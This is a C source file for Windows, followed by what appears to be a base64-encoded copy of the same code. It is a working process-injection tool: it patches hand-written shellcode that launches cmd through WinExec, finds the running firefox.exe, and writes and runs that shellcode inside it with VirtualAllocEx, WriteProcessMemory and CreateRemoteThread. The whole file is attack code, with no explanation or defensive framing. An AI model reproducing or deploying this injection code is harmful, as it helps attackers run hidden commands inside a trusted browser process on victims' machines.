#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
unsigned char shellcode[] = "\x8B\xDC"
"\x68\x63\x6D\x64\x20"
"\x8B\xC4"
"\x6A\x01"
"\x50"
"\xB8\x41\x2C\x9A\x77"
"\xFF\xD0"
"\x8B\xE3"
"\x5A"
"\xB8\x00\x00\x00\x00"
"\xFF\xD0";
void PrepareShellcode(void)
{
unsigned long KernelAddr;
unsigned long WinExecAddr;
unsigned long ExitProcessAddr;
DWORD oldProtect;
KernelAddr = (unsigned long)GetModuleHandle(TEXT("Kernel32"));
WinExecAddr = (unsigned long)GetProcAddress((HMODULE)KernelAddr, "WinExec");
ExitProcessAddr = (unsigned long)GetProcAddress((HMODULE)KernelAddr, "ExitProcess");
*(DWORD *)(shellcode + 13) = WinExecAddr;
*(DWORD *)(shellcode + 23) = ExitProcessAddr;
VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
}
DWORD GetPID(LPTSTR lpProcess)
{
PROCESSENTRY32 pe32;
HANDLE snapshot = NULL;
HANDLE hProcess = NULL;
DWORD ProcessID = 0;
if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) != INVALID_HANDLE_VALUE)
{
RtlZeroMemory(&pe32, sizeof(PROCESSENTRY32));
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32First(snapshot, &pe32);
do
{
if (lstrcmp(pe32.szExeFile, lpProcess) == 0)
{
ProcessID = pe32.th32ProcessID;
break;
}
} while (Process32Next(snapshot, &pe32));
}
CloseHandle(snapshot);
return ProcessID;
}
void Inject(HANDLE hProcess)
{
PVOID pRemoteShellcode = NULL;
HANDLE hRemoteThread = NULL;
DWORD dwRemoteThreadID = 0;
DWORD dwInjectStatus = 0;
PrepareShellcode();
__try
{
int size = sizeof(shellcode);
pRemoteShellcode = VirtualAllocEx(hProcess, NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pRemoteShellcode == NULL)
{
return;
}
WriteProcessMemory(hProcess, pRemoteShellcode, shellcode, size, NULL);
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteShellcode, NULL, 0, &dwRemoteThreadID);
if (hRemoteThread == NULL)
{
printf("CreateRemoteThread failed. Last error: %x\n", GetLastError
()); __leave;
WaitForSingleObject(hRemoteThread, INFINITE);
GetExitCodeThread(hRemoteThread, &dwInjectStatus);
}
}
__finally
{
if (!dwInjectStatus)
{
VirtualFreeEx(hProcess, pRemoteShellcode, 0, MEM_RELEASE);
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread);
}
}
}
}
int main()
{
DWORD ProcessID;
HANDLE hProcess;
ProcessID = GetPID(TEXT("firefox.exe"));
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);
if (hProcess != INVALID_HANDLE_VALUE)
{
Inject(hProcess);
CloseHandle(hProcess);
}
return 0;
}
I2luY2x1ZGUgPFdpbmRvd3MuaD4KI2luY2x1ZGUgPFRsSGVscDMyLmg+CiNpbmNsdWRlIDxzdGRpby5oPgoKdW5zaWduZWQgY2hhciBzaGVsbGNvZGVbXSA9ICJceDhCXHhEQyIKIlx4NjhceDYzXHg2RFx4NjRceDIwIgoiXHg4Qlx4QzQiCiJceDZBXHgwMSIKIlx4NTAiCiJceEI4XHg0MVx4MkNceDlBXHg3NyIKIlx4RkZceEQwIgoiXHg4Qlx4RTMiCiJceDVBIgoiXHhCOFx4MDBceDAwXHgwMFx4MDAiCiJceEZGXHhEMCI7Cgp2b2lkIFByZXBhcmVTaGVsbGNvZGUodm9pZCkKewoJdW5zaWduZWQgbG9uZyBLZXJuZWxBZGRyOwoJdW5zaWduZWQgbG9uZyBXaW5FeGVjQWRkcjsKCXVuc2lnbmVkIGxvbmcgRXhpdFByb2Nlc3NBZGRyOwoJRFdPUkQgb2xkUHJvdGVjdDsKCglLZXJuZWxBZGRyID0gKHVuc2lnbmVkIGxvbmcpR2V0TW9kdWxlSGFuZGxlKFRFWFQoIktlcm5lbDMyIikpOwoJV2luRXhlY0FkZHIgPSAodW5zaWduZWQgbG9uZylHZXRQcm9jQWRkcmVzcygoSE1PRFVMRSlLZXJuZWxBZGRyLCAiV2luRXhlYyIpOwoJRXhpdFByb2Nlc3NBZGRyID0gKHVuc2lnbmVkIGxvbmcpR2V0UHJvY0FkZHJlc3MoKEhNT0RVTEUpS2VybmVsQWRkciwgIkV4aXRQcm9jZXNzIik7CgoJKihEV09SRCAqKShzaGVsbGNvZGUgKyAxMykgPSBXaW5FeGVjQWRkcjsKCSooRFdPUkQgKikoc2hlbGxjb2RlICsgMjMpID0gRXhpdFByb2Nlc3NBZGRyOwoKCVZpcnR1YWxQcm90ZWN0KHNoZWxsY29kZSwgc2l6ZW9mKHNoZWxsY29kZSksIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUsICZvbGRQcm90ZWN0KTsKfQoKRFdPUkQgR2V0UElEKExQVFNUUiBscFByb2Nlc3MpCnsKCVBST0NFU1NFTlRSWTMyIHBlMzI7CglIQU5ETEUgc25hcHNob3QgPSBOVUxMOwoJSEFORExFIGhQcm9jZXNzID0gTlVMTDsKCURXT1JEIFByb2Nlc3NJRCA9IDA7CgoJaWYgKChzbmFwc2hvdCA9IENyZWF0ZVRvb2xoZWxwMzJTbmFwc2hvdChUSDMyQ1NfU05BUFBST0NFU1MsIDApKSAhPSBJTlZBTElEX0hBTkRMRV9WQUxVRSkKCXsKCQlSdGxaZXJvTWVtb3J5KCZwZTMyLCBzaXplb2YoUFJPQ0VTU0VOVFJZMzIpKTsKCQlwZTMyLmR3U2l6ZSA9IHNpemVvZihQUk9DRVNTRU5UUlkzMik7CgkJUHJvY2VzczMyRmlyc3Qoc25hcHNob3QsICZwZTMyKTsKCQlkbwoJCXsKCQkJaWYgKGxzdHJjbXAocGUzMi5zekV4ZUZpbGUsIGxwUHJvY2VzcykgPT0gMCkKCQkJewoJCQkJUHJvY2Vzc0lEID0gcGUzMi50aDMyUHJvY2Vzc0lEOwoJCQkJYnJlYWs7CgkJCX0KCQl9IHdoaWxlIChQcm9jZXNzMzJOZXh0KHNuYXBzaG90LCAmcGUzMikpOwoJfQoJCQoJQ2xvc2VIYW5kbGUoc25hcHNob3QpOwoJcmV0dXJuIFByb2Nlc3NJRDsKfQoKdm9pZCBJbmplY3QoSEFORExFIGhQcm9jZXNzKQp7CglQVk9JRAlwUmVtb3RlU2hlbGxjb2RlID0gTlVMTDsKCUhBTkRMRQloUmVtb3RlVGhyZWFkID0gTlVMTDsKCURXT1JECWR3UmVtb3RlVGhyZWFkSUQgPSAwOwoJRFdPUkQJZHdJbmplY3RTdGF0dXMgPSAwOwoKCVByZXBhcmVTaGVsbGNvZGUoKTsKCQoJX190cnkKCXsKCQlpbnQgc2l6ZSA9IHNpemVvZihzaGVsbGNvZGUpOwoKCQlwUmVtb3RlU2hlbGxjb2RlID0gVmlydHVhbEFsbG9jRXgoaFByb2Nlc3MsIE5VTEwsIHNpemUsIE1FTV9DT01NSVQsIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUpOwoJCWlmIChwUmVtb3RlU2hlbGxjb2RlID09IE5VTEwpCgkJewoJCQlyZXR1cm47CgkJfQoKCQlXcml0ZVByb2Nlc3NNZW1vcnkoaFByb2Nlc3MsIHBSZW1vdGVTaGVsbGNvZGUsIHNoZWxsY29kZSwgc2l6ZSwgTlVMTCk7CgoJCWhSZW1vdGVUaHJlYWQgPSBDcmVhdGVSZW1vdGVUaHJlYWQoaFByb2Nlc3MsIE5VTEwsIDAsIChMUFRIUkVBRF9TVEFSVF9ST1VUSU5FKXBSZW1vdGVTaGVsbGNvZGUsIE5VTEwsIDAsICZkd1JlbW90ZVRocmVhZElEKTsKCQlpZiAoaFJlbW90ZVRocmVhZCA9PSBOVUxMKQoJCXsKCQkJcHJpbnRmKCJDcmVhdGVSZW1vdGVUaHJlYWQgZmFpbGVkLiBMYXN0IGVycm9yOiAleFxuIiwgR2V0TGFzdEVycm9yKCkpOwoJCQlfX2xlYXZlOwoKCQkJV2FpdEZvclNpbmdsZU9iamVjdChoUmVtb3RlVGhyZWFkLCBJTkZJTklURSk7CgkJCUdldEV4aXRDb2RlVGhyZWFkKGhSZW1vdGVUaHJlYWQsICZkd0luamVjdFN0YXR1cyk7CgkJfQoJfQoJX19maW5hbGx5Cgl7CgkJaWYgKCFkd0luamVjdFN0YXR1cykKCQl7CgkJCXByaW50ZigiSW5qZWN0aW9uIGZhaWxlZFxuIik7CgkJCVZpcnR1YWxGcmVlRXgoaFByb2Nlc3MsIHBSZW1vdGVTaGVsbGNvZGUsIDAsIE1FTV9SRUxFQVNFKTsKCgkJCWlmIChoUmVtb3RlVGhyZWFkICE9IE5VTEwpCgkJCXsKCQkJCUNsb3NlSGFuZGxlKGhSZW1vdGVUaHJlYWQpOwoJCQl9CgkJfQoJfQp9CgppbnQgbWFpbigpCnsKCURXT1JEIFByb2Nlc3NJRDsKCUhBTkRMRSBoUHJvY2VzczsKCglQcm9jZXNzSUQgPSBHZXRQSUQoVEVYVCgiZmlyZWZveC5leGUiKSk7CgloUHJvY2VzcyA9IE9wZW5Qcm9jZXNzKFBST0NFU1NfQUxMX0FDQ0VTUywgRkFMU0UsIFByb2Nlc3NJRCk7CgoJaWYgKGhQcm9jZXNzICE9IElOVkFMSURfSEFORExFX1ZBTFVFKQoJewoJCUluamVjdChoUHJvY2Vzcyk7CgkJQ2xvc2VIYW5kbGUoaFByb2Nlc3MpOwoJfQoJcmV0dXJuIDA7Cn0=